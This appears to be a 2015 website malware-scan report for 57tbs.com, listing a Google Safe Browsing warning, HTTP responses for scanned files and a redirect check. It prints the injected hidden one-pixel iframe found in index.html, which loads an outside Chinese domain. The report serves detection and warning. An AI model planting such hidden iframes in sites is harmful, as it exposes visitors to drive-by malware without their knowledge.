Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=57tbs.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.57tbs.com/ | HTTP/1.1 200 OK Date: Mon, 19 Jan 2015 17:42:16 GMT Accept-Ranges: bytes ETag: "dace77b9fc33d01:b77" Server: Microsoft-IIS/6.0 Content-Length: 26327 Content-Location: http://www.57tbs.com/index.html Content-Type: text/html Last-Modified: Mon, 19 Jan 2015 15:29:33 GMT X-Powered-By: ASP.NET | clean |
http://www.57tbs.com/index.html | 200 OK Content-Length: 26327 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) myFocus.set({ id:'myFocus20131387660812', pattern:'mF_kdui', trigger:'click', wrap:'false', auto:'true', loadIMGTimeout:1, width:740, height:340 }); Antivirus reports:
Hidden iFrame found. size: 100x1 src: http://www.seahood.cn <iframe width="100%" height="1" class="share_self" frameborder="0" scrolling="no" src="http://www.seahood.cn"> | ||
http://www.57tbs.com/webjs/jquery-1.4.2.min.js | 200 OK Content-Length: 72328 Content-Type: application/x-javascript | clean |
http://www.57tbs.com/webjs/jquery.hoverIntent.minified.js | 200 OK Content-Length: 1614 Content-Type: application/x-javascript | clean |
http://www.57tbs.com/webjs/navigation.js | 200 OK Content-Length: 2923 Content-Type: application/x-javascript | clean |
http://www.57tbs.com/webjs/header.js | 200 OK Content-Length: 9151 Content-Type: application/x-javascript | clean |
http://www.57tbs.com/shop/GetStock.asp?id=26&action=GroupBuyHasSold | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.57tbs.com/test404page.js | 404 Not Found Content-Length: 2513 Content-Type: text/html | clean |
http://www.57tbs.com/shop/GetStock.asp?id=25&action=GroupBuyHasSold | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.57tbs.com/shop/GetStock.asp?id=24&action=GroupBuyHasSold | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://static.anquan.org/static/outer/js/aq_auth.js | 200 OK Content-Length: 10140 Content-Type: application/javascript | clean |
http://www.57tbs.com/webjs/js.js | 200 OK Content-Length: 992 Content-Type: application/x-javascript | clean |
http://www.57tbs.com/ks_inc/ajax.js | 200 OK Content-Length: 3240 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 57tbs.com
Result:
GET / HTTP/1.1
Host: 57tbs.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 57tbs.com
Referer: http://www.google.com/search?q=57tbs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 57tbs.com
Referer: http://www.google.com/search?q=57tbs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.